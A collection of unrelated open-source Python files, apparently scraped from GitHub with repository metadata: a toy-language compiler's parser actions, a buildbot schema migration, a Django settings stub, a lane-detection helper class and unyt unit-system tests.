            print('Error: Argument type doesn\'t match the type of the parameter declared')
            exit(1)

def p_call(p):
    '''call : ID prepareParams LEFTPAREN call1 RIGHTPAREN SEMICOLON'''
    # NOTE(review): this assigns a local 'argumentCount' (no global
    # declaration), so the module-level counter is NOT reset here --
    # presumably a bug; confirm intended behavior.
    argumentCount = 0
    addQuadruple('GOFUNC', '', '', funcGlobal[p[1]]['startQuadruple'])
    if funcGlobal[p[1]]['type'] != VOID:
        operandStack.append(funcGlobal[p[1]])
    p[0] = funcGlobal[p[1]]['type']

def p_prepareParams(p):
    # Embedded action before '(': reserve activation memory and load the
    # callee's declared parameter list.
    '''prepareParams : empty'''
    global sendParams
    addQuadruple('MEMORY', '', '', funcGlobal[p[-1]])
    sendParams = funcGlobal[p[-1]]['parameters']

def p_addArgument(p):
    '''addArgument : empty'''
    global argumentCount
    argumentCount += 1
def p_parameters1(p):
    '''parameters1 : empty
                   | COMMA type ID addParameter parameters1'''

def p_parameters(p):
    # Formal parameter list, possibly empty.
    '''parameters : empty
                  | type ID addParameter parameters1'''

def p_constant1(p):
    '''constant1 : empty
                 | COMMA cte constant1'''

def p_constant(p):
    # A scalar constant or a bracketed list of constants.
    '''constant : cte
                | LEFTSQBKT cte constant1 RIGHTSQBKT'''
    if len(p) == 2:
        p[0] = p[1]

def p_cte(p):
    '''cte : ID
           | varArr
           | TRUE
           | FALSE
           | cteN
           | cteS'''
    p[0] = p[1]

def p_cteN(p):
    # Numeric literal; registered in the constant table by addConstant.
    '''cteN : NUMBERINT addConstant
            | NUMBERFLT addConstant'''
    p[0] = p[1]

def p_cteS(p):
    # String literal: strip the surrounding quotes and register it.
    '''cteS : STRING'''
    cte = p[1]
    if '\"' in cte:
        cte = cte.replace('\"','')
    global constants
    if not cte in constants.keys():
        constants[cte] = {'value':cte, 'type':STRING, 'dir':constVarCount[STRING]}
        constVarCount[STRING] += 1
    p[0] = cte

def p_condition2(p):
    # Optional else branch; ifEnd backpatches all pending jumps.
    '''condition2 : empty ifEnd
                  | ELSE block ifEnd'''

def p_condition1(p):
    # Zero or more elseif branches.
    '''condition1 : empty
                  | ELSEIF LEFTPAREN expression RIGHTPAREN ifStart2 block ifContinue condition1'''

def p_condition(p):
    '''condition : IF LEFTPAREN expression RIGHTPAREN ifStart block ifContinue condition1 condition2'''

def p_assignement2(p):
    # Right-hand side: either a function call or an expression.
    '''assignement2 : call
                    | expression SEMICOLON'''
    if p[1] == VOID:
        print('Error: Cannot assign a function of type void.')
        exit(1)

def p_assignement1(p):
    # Left-hand side: must already be declared.
    '''assignement1 : ID
                    | varArr'''
    p[0] = p[1]
    if not p[1] in varLocal.keys() and not p[1] in varGlobal.keys():
        print('Error: Cannot assign undeclared variable')
        exit(1)

def p_assignement(p):
    '''assignement : assignement1 ASSIGN assignement2'''
    var = {}
    if p[1] in varLocal.keys():
        var = varLocal[p[1]]
    else:
        var = varGlobal[p[1]]
    operand = operandStack.pop()
    resultType = getResultType(var['type'], '=', operand['type']%10)
    if resultType > 0:
        addQuadruple('=', operand['dir'], '', var['dir'])
    else:
        print('Error: Assignment type mismatch')
        exit(1)

def p_varArr(p):
    '''varArr : ID LEFTSQBKT exp RIGHTSQBKT'''
    # NOTE(review): array indexing only resolves the variable and prints
    # debug output; no bounds check or address quadruples are emitted yet.
    var = {}
    if p[1] in varLocal.keys():
        var = varLocal[p[1]]
    else:
        var = varGlobal[p[1]]
    print('vararr')
    print(var)

def p_type(p):
    '''type : TBOOL addType
            | TINT addType
            | TFLOAT addType
            | TSTRING addType'''
# extra grammar
# Embedded semantic actions (each matches 'empty' and only runs side effects).
def p_addVariable(p):
    # Register the ID just seen (p[-1]) under the current declaration type.
    '''addVariable : empty'''
    global lastVarName
    lastVarName = p[-1]
    variableName = lastVarName
    addVariable(variableName, variableType)

def p_addConstant(p):
    # Register the numeric literal just seen in the constant table.
    '''addConstant : empty'''
    constType = -1
    cte = num(p[-1])
    if type(cte) is int:
        constType = INT
    else:
        constType = FLOAT
    global constants
    if not str(cte) in constants.keys():
        constants[str(cte)] = {'value':cte, 'type':constType, 'dir':constVarCount[constType]}
        constVarCount[constType] += 1

def p_saveFuncName(p):
    '''saveFuncName : empty'''
    global lastFuncName
    lastFuncName = p[-1]

def p_funcTypeNext(p):
    # Mark that the next 'type' belongs to a function header.
    '''funcTypeNext : empty'''
    global funcTypeNext
    funcTypeNext = True

def p_saveFuncTypeVoid(p):
    '''saveFuncTypeVoid : empty'''
    global funcType
    funcType = VOID

def p_addParameter(p):
    # Declare the parameter as a local variable and record it in the
    # function's parameter list.
    '''addParameter : empty'''
    global lastVarName
    global funcParameters
    lastVarName = p[-1]
    variableName = lastVarName
    addVariable(variableName, variableType)
    funcParameters.append(varLocal[variableName])

def p_addType(p):
    # Route the type token to either the pending function or variable.
    # getTypeValue presumably comes from the Cube star-import.
    '''addType : empty'''
    global variableType
    global funcTypeNext
    global funcType
    if funcTypeNext:
        funcType = getTypeValue(p[-1])
    else:
        variableType = getTypeValue(p[-1])
    funcTypeNext = False

def p_saveOperation(p):
    # Push the operator token preceding this action onto the stack.
    '''saveOperation : empty'''
    global operationStack
    operationStack.append(p[-1])

def p_termEnded(p):
    # Resolve a pending additive/OR operator into a quadruple.
    '''termEnded : empty'''
    global operationStack
    global operandStack
    if len(operationStack) > 0:
        if operationStack[-1] == '+' or operationStack[-1] == '-' or operationStack[-1] == '||':
            operand2 = operandStack.pop()
            operation = operationStack.pop()
            operand1 = operandStack.pop()
            resultType = getResultType(operand1['type']%10, operation, operand2['type'])
            if resultType > 0:
                tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
                addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar['dir'])
                operandStack.append(tempVar)
                tempVarCount[resultType] += 1
            else:
                print('Error: Term type mismatch')
                exit(1)
    p[0] = "hio"

def p_factorEnded(p):
    # Resolve a pending multiplicative/AND operator into a quadruple.
    '''factorEnded : empty'''
    global operationStack
    global operandStack
    if len(operationStack) > 0:
        if operationStack[-1] == '*' or operationStack[-1] == '/' or operationStack[-1] == '&&':
            operand2 = operandStack.pop()
            operation = operationStack.pop()
            operand1 = operandStack.pop()
            resultType = getResultType(operand1['type']%10, operation, operand2['type'])
            if resultType > 0:
                tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
                addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar['dir'])
                operandStack.append(tempVar)
                tempVarCount[resultType] += 1
            else:
                print('Error: Factor type mismatch')
                exit(1)

def p_addFakeBottom(p):
    # '(' isolates the operators of a sub-expression.
    '''addFakeBottom : empty'''
    global operationStack
    operationStack.append('(')

def p_removeFakeBottom(p):
    '''removeFakeBottom : empty'''
    global operationStack
    operationStack.pop()
def p_changeToLocalScope(p):
    '''changeToLocalScope : empty'''
    global scope
    scope = 'local'

def p_changeToGlobalScope(p):
    '''changeToGlobalScope : empty'''
    global scope
    scope = 'global'

def p_ifStart(p):
    # Push an 'IF' marker so ifEnd knows which pending jumps belong to this
    # if/elseif chain, then emit the first conditional jump.
    '''ifStart : empty'''
    jumpStack.append('IF')
    p_ifStart2(p)

def p_ifStart2(p):
    # Emit GOTOF on the condition just evaluated; target backpatched later.
    '''ifStart2 : empty'''
    condition = operandStack.pop()
    if condition['type'] == BOOL:
        addQuadruple('GOTOF', condition, '', '')
        jumpStack.append(len(quadruples)-1)
    else:
        print('Error: Condition in \'if\' statement must evaluate to a bool.')
        exit(1)

def p_ifContinue(p):
    # End of a branch: emit the GOTO that skips the remaining branches and
    # backpatch the previous GOTOF to the start of the next branch.
    '''ifContinue : empty'''
    addQuadruple('GOTO', '', '', '')
    complete = jumpStack.pop()
    jumpStack.append(len(quadruples)-1)
    completeQuadruple(complete, len(quadruples))

def p_ifEnd(p):
    # Backpatch every branch-exit GOTO down to the 'IF' marker.
    '''ifEnd : empty'''
    while jumpStack[-1] != 'IF':
        completeQuadruple(jumpStack.pop(), len(quadruples))
    jumpStack.pop()

def p_whileStart(p):
    # Remember where the condition starts so whileEnd can loop back.
    '''whileStart : empty'''
    jumpStack.append(len(quadruples))

def p_whileCheck(p):
    # NOTE(review): the error message says 'if' but this is the while
    # condition -- message copied from p_ifStart2.
    '''whileCheck : empty'''
    condition = operandStack.pop()
    if condition['type'] == BOOL:
        addQuadruple('GOTOF', condition, '', '')
        jumpStack.append(len(quadruples)-1)
    else:
        print('Error: Condition in \'if\' statement must evaluate to a bool.')
        exit(1)

def p_whileEnd(p):
    # Jump back to the condition; backpatch the GOTOF to fall through here.
    '''whileEnd : empty'''
    complete = jumpStack.pop()
    addQuadruple('GOTO', '', '', jumpStack.pop())
    completeQuadruple(complete, len(quadruples))

def p_jumpToMain(p):
    # Placeholder GOTO over the function definitions; completed at 'main'.
    '''jumpToMain : empty'''
    addQuadruple('GOTO', '', '', '')
    jumpStack.append(len(quadruples)-1)

def p_completeJumpToMain(p):
    '''completeJumpToMain : empty'''
    completeQuadruple(jumpStack.pop(), len(quadruples))

def p_funcStart(p):
    # Register the function with its starting quadruple index.
    '''funcStart : empty'''
    addFunction(lastFuncName, funcType, len(quadruples))

def p_funcReturn(p):
    # Emit RETURN after checking the value against the declared type.
    '''funcReturn : empty'''
    print('return')
    print(p[-1])
    value = operandStack.pop()
    if value['type'] == funcGlobal[lastFuncName]['type']:
        addQuadruple('RETURN', '', '', value['dir'])
    else:
        print('Error: Type of return value in function doesn\'t match function\'s declared type.')
        exit(1)

def p_funcEnd(p):
    # Close the function: store its parameters, reset local state, ENDFUNC.
    '''funcEnd : empty'''
    funcGlobal[lastFuncName]['parameters'] = funcParameters
    print('local vars: %s' % varLocal)
    resetLocalCounters()
    addQuadruple('ENDFUNC', '', '', '')

def p_error(p):
    # Any syntax error aborts the compilation.
    if p:
        print("Syntax error at '%s'" % p)#p.value)
    else:
        print("Syntax error at EOF")
    exit(1)

import ply.yacc as yacc
yacc.yacc()
#Functions
def addVariable(variable, varType):
    # Register a variable in the table for the current scope, assigning it
    # the next virtual address for its type.  Any name clash is fatal.
    global varGlobal
    global varLocal
    if variable in funcGlobal.keys():
        print("Variable error: Variable cannot have the same name as a function")
        exit(1)
    if scope == 'global':
        if not variable in varGlobal.keys():
            varGlobal[variable] = {'name':variable, 'type':varType, 'dir':globalVarCount[varType]}
            globalVarCount[varType] += 1
        else:
            print("Variable error: Variable is already declared globally")
            exit(1)
    else:
        if not variable in varLocal.keys():
            varLocal[variable] = {'name':variable, 'type':varType, 'dir':localVarCount[varType]}
            localVarCount[varType] += 1
        else:
            print("Variable error: Variable is already declared locally")
            exit(1)

def convertVariableToArray(size):
    # Mark the most recently declared variable as an array of 'size'.
    # Multiplying the type code by 11 presumably encodes "array of type"
    # (see the %10 decodes elsewhere) -- confirm against Cube.
    global varGlobal
    global varLocal
    if scope == 'global':
        varGlobal[lastVarName]['type'] *= 11
        varGlobal[lastVarName]['size'] = size
    else:
        varLocal[lastVarName]['type'] *= 11
        varLocal[lastVarName]['size'] = size

def addFunction(name, funType, startQuadruple):
    # Register a function in the directory, snapshotting the current local
    # and temporary address counters, and allocating a global address for
    # the return value of non-void functions.
    global funcGlobal
    if name in varGlobal.keys():
        print("Function error: Function cannot have the same name as a variable")
        exit(1)
    if not name in funcGlobal.keys():
        funcGlobal[name] = {'name':name, 'type':funType, 'startQuadruple':startQuadruple, 'boolCount':localVarCount[BOOL], 'intCount':localVarCount[INT], 'floatCount':localVarCount[FLOAT], 'stringCount':localVarCount[STRING], 'boolTempCount':tempVarCount[BOOL], 'intTempCount':tempVarCount[INT], 'floatTempCount':tempVarCount[FLOAT], 'stringTempCount':tempVarCount[STRING]}
        if funType != 0:
            funcGlobal[name]['dir'] = globalVarCount[funType]
            globalVarCount[funType] += 1
    else:
        print("Function error: Function is already declared")
        exit(1)
def addQuadruple(operation, var1, var2, result):
    """Append one intermediate-code quadruple to the global program list."""
    global quadruples
    quad = dict(op=operation, var1=var1, var2=var2, result=result)
    quadruples.append(quad)
def completeQuadruple(index, newValue):
    """Backpatch the 'result' slot of quadruple *index* (e.g. a jump target)."""
    pending = quadruples[index]
    pending['result'] = newValue
def num(s):
    """Convert string *s* to an int when integral, otherwise to a float."""
    try:
        value = int(s)
    except ValueError:
        value = float(s)
    return value
def getOperand(key):
    """Resolve *key* against constants, then locals, then globals.

    Returns the matching symbol-table entry, or None when unknown.
    """
    for table in (constants, varLocal, varGlobal):
        if key in table:
            return table[key]
    return None
def resetLocalCounters():
    """Clear per-function state and rewind local/temp address counters.

    Locals start at base 20000 and temporaries at base 30000; each type
    bucket is offset by 2500 in the order BOOL, INT, FLOAT, STRING.
    """
    global varLocal
    global funcParameters
    global localVarCount
    global tempVarCount
    varLocal = {}
    funcParameters = []
    for counter, base in ((localVarCount, 20000), (tempVarCount, 30000)):
        counter[BOOL] = base
        counter[INT] = base + 2500
        counter[FLOAT] = base + 5000
        counter[STRING] = base + 7500
# Main
if __name__ == '__main__':
    # Check for file
    if (len(sys.argv) > 1):
        file = sys.argv[1]
        # Open file
        try:
            f = open(file, 'r')
            data = f.read()
            f.close()
            # Parse the data; the start rule apparently reduces to 'OK'
            # on success.  # NOTE(review): convention assumed — confirm
            # against the grammar's start production.
            if (yacc.parse(data, tracking = True) == 'OK'):
                print(dirProc);
                executeVirtualMachine(funcGlobal, quadruples, constants)
        except EOFError:
            print(EOFError)
    else:
        print('File missing')
        # No source file given: read statements interactively from stdin.
        # NOTE(review): original indentation was lost; this REPL loop is
        # assumed to belong to the else-branch — confirm.
        while 1:
            try:
                s = raw_input('')  # Python 2 builtin
            except EOFError:
                break
            if not s:
                continue
            yacc.parse(s)
| {
"content_hash": "65ecc0d547b366b6bcebeca7a1b1b66e",
"timestamp": "",
"source": "github",
"line_count": 806,
"max_line_length": 367,
"avg_line_length": 25.325062034739453,
"alnum_prop": 0.6660297864001568,
"repo_name": "sanchezz93/Giga-Compiler",
"id": "eed121529964593afe8075d28ac5d2c7875b8242",
"size": "20412",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Entrega 5/Giga.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11375"
},
{
"name": "CSS",
"bytes": "693534"
},
{
"name": "Emacs Lisp",
"bytes": "12050"
},
{
"name": "HTML",
"bytes": "7963199"
},
{
"name": "JavaScript",
"bytes": "118328003"
},
{
"name": "Python",
"bytes": "2269416"
},
{
"name": "Shell",
"bytes": "33230"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import print_function
import sqlalchemy as sa
from buildbot.util import sautils
def upgrade(migrate_engine):
    """Add an 'enabled' flag (default on) to the schedulers table."""
    meta = sa.MetaData()
    meta.bind = migrate_engine
    schedulers = sautils.Table('schedulers', meta, autoload=True)
    enabled_col = sa.Column('enabled', sa.SmallInteger,
                            nullable=False, server_default="1")
    enabled_col.create(schedulers)
| {
"content_hash": "fb79ed353335e9a66e39a51a5a3fd0ee",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 75,
"avg_line_length": 30.466666666666665,
"alnum_prop": 0.7045951859956237,
"repo_name": "Alecto3-D/testable-greeter",
"id": "9ab6e77806fbe69fff4459af2e53faafaeb633b6",
"size": "1161",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "bb-master/sandbox/lib/python3.5/site-packages/buildbot/db/migrate/versions/049_add_schedulers_enabled.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1340"
},
{
"name": "JavaScript",
"bytes": "6003191"
},
{
"name": "Makefile",
"bytes": "7521"
},
{
"name": "Python",
"bytes": "4833445"
},
{
"name": "RAML",
"bytes": "62192"
},
{
"name": "Shell",
"bytes": "3682"
}
],
"symlink_target": ""
} |
from .base import *
from ._ci import *
from ._admin import *
| {
"content_hash": "c44d2a7580773396a4514bc964f90bc8",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 21,
"avg_line_length": 20.333333333333332,
"alnum_prop": 0.6721311475409836,
"repo_name": "sunForest/AviPost",
"id": "daa423fd08597b4898f69a46783f0f98b51c74c7",
"size": "61",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "avipost/avipost/settings/ci_admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Gherkin",
"bytes": "3188"
},
{
"name": "Python",
"bytes": "35993"
},
{
"name": "Shell",
"bytes": "2516"
}
],
"symlink_target": ""
} |
import numpy as np
class Line():
    """Rolling history of lane-line fits over the last ``k`` video frames."""

    def __init__(self):
        # was the line detected in the last iteration?
        self.detected = False
        # polynomial coefficients for the most recent fit
        self.current_fit = [np.array([False])]
        # window size: number of past frames to keep
        self.k = 5
        self.last_fits = []
        self.radius_of_curvature = []
        self.line_base_pos = []
        # Pre-fill the histories with None placeholders so that
        # append + drop-oldest keeps the window at exactly k entries.
        for i in range(self.k):
            self.last_fits.append(None)
            self.radius_of_curvature.append(None)
            self.line_base_pos.append(None)
        # Exponentially smoothed fit (see add_stats).
        self.temp_fit = [np.array([False])]
        # True until the first detection (or after 5 consecutive misses).
        self.init = True
        self.temp_counter = 0

    def add_stats(self, detected, fit, curvature, distance):
        """Record one frame's detection result and update the smoothed fit.

        On detection the fit is blended into ``temp_fit`` with an
        0.8/0.2 exponential moving average; after 5 consecutive misses
        the smoother is re-initialised.
        """
        self.detected = detected
        if self.detected:
            self.current_fit = fit
            self.last_fits.append(fit)
            self.radius_of_curvature.append(curvature)
            self.line_base_pos.append(distance)
            if self.init:
                self.init = False
                self.temp_fit = fit
            else:
                # NOTE(review): assumes fit supports elementwise arithmetic
                # (e.g. a numpy array) — confirm with the caller.
                self.temp_fit = self.temp_fit*0.8 + fit*0.2
        else:
            self.last_fits.append(None)
            self.radius_of_curvature.append(None)
            self.line_base_pos.append(None)
            self.temp_counter += 1
            if self.temp_counter == 5:
                self.temp_counter = 0
                self.init = True
        # Drop the oldest entry so each history stays k elements long.
        self.last_fits = self.last_fits[1:]
        self.radius_of_curvature = self.radius_of_curvature[1:]
        self.line_base_pos = self.line_base_pos[1:]

    def get_best_fit(self):
        """Return (smoothed fit, mean curvature, mean distance), or None.

        Returns None while no detection has been recorded (``init``).
        """
        temp = np.zeros([3])
        curv = 0
        dist = 0
        count = 0
        for i in range(self.k):
            if self.last_fits[i] is not None:
                temp += self.last_fits[i]
                curv += self.radius_of_curvature[i]
                dist += self.line_base_pos[i]
                count += 1
        '''
        if count == 0:
            return None
        else:
            return (temp/float(count), curv/float(count), dist/float(count))
        '''
        # NOTE(review): if init is False but all k history slots are None,
        # count == 0 and the division below raises ZeroDivisionError — confirm
        # whether that state is reachable given add_stats' reset logic.
        if self.init:
            return None
        else:
            return (self.temp_fit, curv/float(count), dist/float(count))
| {
"content_hash": "095da3ddbbc7ba8449f498c9fc647f48",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 76,
"avg_line_length": 31.12676056338028,
"alnum_prop": 0.5158371040723982,
"repo_name": "camigord/Self-Driving-Car-Nanodegree",
"id": "64bb054a10c1a450abbcd531553c716d9bef8b54",
"size": "2210",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "P4-Advanced-Lane-Finding/utils/Line.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1139723"
},
{
"name": "Jupyter Notebook",
"bytes": "16877239"
},
{
"name": "Python",
"bytes": "51094"
}
],
"symlink_target": ""
} |
"""
Test symbolic unit handling.
"""
# -----------------------------------------------------------------------------
# Copyright (c) 2018, yt Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the LICENSE file, distributed with this software.
# -----------------------------------------------------------------------------
import operator
import pickle
import numpy as np
import pytest
from numpy.testing import (
assert_allclose,
assert_almost_equal,
assert_array_almost_equal_nulp,
assert_equal,
)
from sympy import Symbol
import unyt.unit_symbols as unit_symbols
from unyt._physical_ratios import (
m_per_km,
m_per_mpc,
m_per_pc,
mass_sun_kg,
sec_per_year,
)
from unyt._unit_lookup_table import (
default_unit_symbol_lut,
name_alternatives,
unit_prefixes,
)
from unyt.array import unyt_quantity
from unyt.dimensions import (
energy,
length,
magnetic_field_cgs,
magnetic_field_mks,
mass,
power,
rate,
temperature,
time,
)
from unyt.exceptions import InvalidUnitOperation, UnitConversionError, UnitsNotReducible
from unyt.testing import assert_allclose_units
from unyt.unit_object import Unit, UnitParseError, default_unit_registry
from unyt.unit_registry import UnitRegistry
from unyt.unit_systems import UnitSystem, cgs_unit_system
def test_no_conflicting_symbols():
    """
    Check unit symbol definitions for conflicts.
    """
    seen = set(default_unit_symbol_lut.keys())
    for symbol, info in default_unit_symbol_lut.items():
        # Prefixable units are checked against every SI prefix; the
        # others are only checked against themselves.
        prefixes = list(unit_prefixes.keys()) if info[4] else [symbol]
        for prefix in prefixes:
            candidate = f"{prefix}{symbol}"
            assert candidate not in seen, f"Duplicate symbol: {candidate}"
            seen.add(candidate)
def test_dimensionless():
    """
    Create dimensionless unit and check attributes.
    """
    # Both the no-argument and empty-string constructors must produce
    # the dimensionless unit.
    for unit in (Unit(), Unit("")):
        assert unit.is_dimensionless
        assert unit.expr == 1
        assert unit.base_value == 1
        assert unit.dimensions == 1
        assert_equal(unit.latex_repr, "")
    # Comparisons with unrelated objects never raise; they are unequal.
    u1 = Unit()
    assert u1 != "hello!"
    assert (u1 == "hello") is False
def test_create_from_string():
"""
Create units with strings and check attributes.
"""
u1 = Unit("kg * m**2 * s**-2")
assert u1.dimensions == energy
assert u1.base_value == 1.0
# make sure order doesn't matter
u2 = Unit("m**2 * s**-2 * kg")
assert u2.dimensions == energy
assert u2.base_value == 1.0
# Test rationals
u3 = Unit("kg**0.5 * m**-0.5 * s**-1")
assert u3.dimensions == magnetic_field_cgs
assert u3.base_value == 1.0
# sqrt functions
u4 = Unit("sqrt(kg)/sqrt(m)/s")
assert u4.dimensions == magnetic_field_cgs
assert u4.base_value == 1.0
# commutative sqrt function
u5 = Unit("sqrt(kg/m)/s")
assert u5.dimensions == magnetic_field_cgs
assert u5.base_value == 1.0
# nonzero CGS conversion factor
u6 = Unit("Msun/pc**3")
assert u6.dimensions == mass / length**3
assert_array_almost_equal_nulp(
np.array([u6.base_value]), np.array([mass_sun_kg / m_per_pc**3])
)
with pytest.raises(UnitParseError):
Unit("m**m")
with pytest.raises(UnitParseError):
Unit("m**g")
with pytest.raises(UnitParseError):
Unit("m+g")
with pytest.raises(UnitParseError):
Unit("m-g")
with pytest.raises(UnitParseError):
Unit("hello!")
with pytest.raises(UnitParseError):
Unit("True")
with pytest.raises(UnitParseError):
Unit("else")
with pytest.raises(UnitParseError):
Unit("hello(37)")
with pytest.raises(UnitParseError):
Unit("hello(foo=37)")
cm = Unit("cm")
data = 1 * cm
assert Unit(data) == cm
assert Unit(b"cm") == cm
def test_create_from_expr():
"""
Create units from sympy Exprs and check attributes.
"""
pc_mks = m_per_pc
yr_mks = sec_per_year
# Symbol expr
s1 = Symbol("pc", positive=True)
s2 = Symbol("yr", positive=True)
# Mul expr
s3 = s1 * s2
# Pow expr
s4 = s1**2 * s2 ** (-1)
u1 = Unit(s1)
u2 = Unit(s2)
u3 = Unit(s3)
u4 = Unit(s4)
assert u1.expr == s1
assert u2.expr == s2
assert u3.expr == s3
assert u4.expr == s4
assert_allclose_units(u1.base_value, pc_mks, 1e-12)
assert_allclose_units(u2.base_value, yr_mks, 1e-12)
assert_allclose_units(u3.base_value, pc_mks * yr_mks, 1e-12)
assert_allclose_units(u4.base_value, pc_mks**2 / yr_mks, 1e-12)
assert u1.dimensions == length
assert u2.dimensions == time
assert u3.dimensions == length * time
assert u4.dimensions == length**2 / time
def test_create_with_duplicate_dimensions():
"""
Create units with overlapping dimensions. Ex: km/Mpc.
"""
u1 = Unit("J * s**-1")
u2 = Unit("km/s/Mpc")
km_mks = m_per_km
Mpc_mks = m_per_mpc
assert u1.base_value == 1
assert u1.dimensions == power
assert_allclose_units(u2.base_value, km_mks / Mpc_mks, 1e-12)
assert u2.dimensions == rate
def test_create_new_symbol():
"""
Create unit with unknown symbol.
"""
u1 = Unit("abc", base_value=42, dimensions=(mass / time))
assert u1.expr == Symbol("abc", positive=True)
assert u1.base_value == 42
assert u1.dimensions == mass / time
u1 = Unit("abc", base_value=42, dimensions=length**3)
assert u1.expr == Symbol("abc", positive=True)
assert u1.base_value == 42
assert u1.dimensions == length**3
u1 = Unit("abc", base_value=42, dimensions=length * (mass * length))
assert u1.expr == Symbol("abc", positive=True)
assert u1.base_value == 42
assert u1.dimensions == length**2 * mass
with pytest.raises(UnitParseError):
Unit("abc", base_value=42, dimensions=length**length)
with pytest.raises(UnitParseError):
Unit("abc", base_value=42, dimensions=length ** (length * length))
with pytest.raises(UnitParseError):
Unit("abc", base_value=42, dimensions=length - mass)
with pytest.raises(UnitParseError):
Unit("abc", base_value=42, dimensions=length + mass)
def test_create_fail_on_unknown_symbol():
"""
Fail to create unit with unknown symbol, without base_value and dimensions.
"""
with pytest.raises(UnitParseError):
Unit(Symbol("jigawatts"))
def test_create_fail_on_bad_symbol_type():
"""
Fail to create unit with bad symbol type.
"""
with pytest.raises(UnitParseError):
Unit([1]) # something other than Expr and str
def test_create_fail_on_bad_dimensions_type():
"""
Fail to create unit with bad dimensions type.
"""
with pytest.raises(UnitParseError):
Unit("a", base_value=1, dimensions="(mass)")
def test_create_fail_on_dimensions_content():
"""
Fail to create unit with bad dimensions expr.
"""
a = Symbol("a")
with pytest.raises(UnitParseError):
Unit("a", base_value=1, dimensions=a)
def test_create_fail_on_base_value_type():
"""
Fail to create unit with bad base_value type.
"""
with pytest.raises(UnitParseError):
Unit("a", base_value="a", dimensions=(mass / time))
def test_string_representation():
    """
    Check unit string representation.
    """
    pc = Unit("pc")
    Myr = Unit("Myr")
    velocity = pc / Myr
    assert str(pc) == "pc"
    assert str(Myr) == "Myr"
    # str and repr agree for a compound unit.
    assert str(velocity) == "pc/Myr"
    assert repr(velocity) == "pc/Myr"
    # The dimensionless unit spells itself out, with repr parenthesized.
    no_units = Unit()
    assert str(no_units) == "dimensionless"
    assert repr(no_units) == "(dimensionless)"
def test_multiplication():
"""
Multiply two units.
"""
msun_mks = mass_sun_kg
pc_mks = m_per_pc
# Create symbols
msun_sym = Symbol("Msun", positive=True)
pc_sym = Symbol("pc", positive=True)
s_sym = Symbol("s", positive=True)
# Create units
u1 = Unit("Msun")
u2 = Unit("pc")
# Mul operation
u3 = u1 * u2
assert u3.expr == msun_sym * pc_sym
assert_allclose_units(u3.base_value, msun_mks * pc_mks, 1e-12)
assert u3.dimensions == mass * length
# Pow and Mul operations
u4 = Unit("pc**2")
u5 = Unit("Msun * s")
u6 = u4 * u5
assert u6.expr == pc_sym**2 * msun_sym * s_sym
assert_allclose_units(u6.base_value, pc_mks**2 * msun_mks, 1e-12)
assert u6.dimensions == length**2 * mass * time
def test_division():
"""
Divide two units.
"""
pc_mks = m_per_pc
km_mks = m_per_km
# Create symbols
pc_sym = Symbol("pc", positive=True)
km_sym = Symbol("km", positive=True)
s_sym = Symbol("s", positive=True)
# Create units
u1 = Unit("pc")
u2 = Unit("km * s")
u3 = u1 / u2
assert u3.expr == pc_sym / (km_sym * s_sym)
assert_allclose_units(u3.base_value, pc_mks / km_mks, 1e-12)
assert u3.dimensions == 1 / time
def test_power():
"""
Take units to some power.
"""
from sympy import nsimplify
from unyt import dimensionless
pc_mks = m_per_pc
mK_mks = 1e-3
u1_dims = mass * length**2 * time**-3 * temperature**4
u1 = Unit("kg * pc**2 * s**-3 * mK**4")
u2 = u1**2
assert u2.dimensions == u1_dims**2
assert_allclose_units(u2.base_value, (pc_mks**2 * mK_mks**4) ** 2, 1e-12)
u3 = u1 ** (-1.0 / 3)
assert u3.dimensions == nsimplify(u1_dims ** (-1.0 / 3))
assert_allclose_units(
u3.base_value, (pc_mks**2 * mK_mks**4) ** (-1.0 / 3), 1e-12
)
assert u1**0.0 == dimensionless
def test_equality():
    """
    Check unit equality with different symbols, but same dimensions and
    base_value.
    """
    speed_km = Unit("km * s**-1")
    speed_m = Unit("m * ms**-1")
    # km/s and m/ms are the same physical unit.
    assert speed_km == speed_m
    assert speed_km.copy() == speed_m
def test_invalid_operations():
u1 = Unit("cm")
u2 = Unit("m")
with pytest.raises(InvalidUnitOperation):
u1 + u2
with pytest.raises(InvalidUnitOperation):
u1 += u2
with pytest.raises(InvalidUnitOperation):
1 + u1
with pytest.raises(InvalidUnitOperation):
u1 + 1
with pytest.raises(InvalidUnitOperation):
u1 - u2
with pytest.raises(InvalidUnitOperation):
u1 -= u2
with pytest.raises(InvalidUnitOperation):
1 - u1
with pytest.raises(InvalidUnitOperation):
u1 - 1
with pytest.raises(InvalidUnitOperation):
u1 *= u2
with pytest.raises(InvalidUnitOperation):
u1 * "hello!"
with pytest.raises(InvalidUnitOperation):
u1 /= u2
with pytest.raises(InvalidUnitOperation):
u1 / "hello!"
with pytest.raises(InvalidUnitOperation):
Unit("B") * Unit("V")
with pytest.raises(InvalidUnitOperation):
Unit("V") * Unit("B")
with pytest.raises(InvalidUnitOperation):
Unit("V") / Unit("Np")
with pytest.raises(InvalidUnitOperation):
Unit("dB") / Unit("dB")
with pytest.raises(InvalidUnitOperation):
Unit("B") ** 2
def test_base_equivalent():
"""
Check base equivalent of a unit.
"""
Msun_mks = mass_sun_kg
Mpc_mks = m_per_mpc
u1 = Unit("Msun * Mpc**-3")
u2 = Unit("kg * m**-3")
u3 = u1.get_base_equivalent()
assert u2.expr == u3.expr
assert u2 == u3
assert_allclose_units(u1.base_value, Msun_mks / Mpc_mks**3, 1e-12)
assert u2.base_value == 1
assert u3.base_value == 1
mass_density = mass / length**3
assert u1.dimensions == mass_density
assert u2.dimensions == mass_density
assert u3.dimensions == mass_density
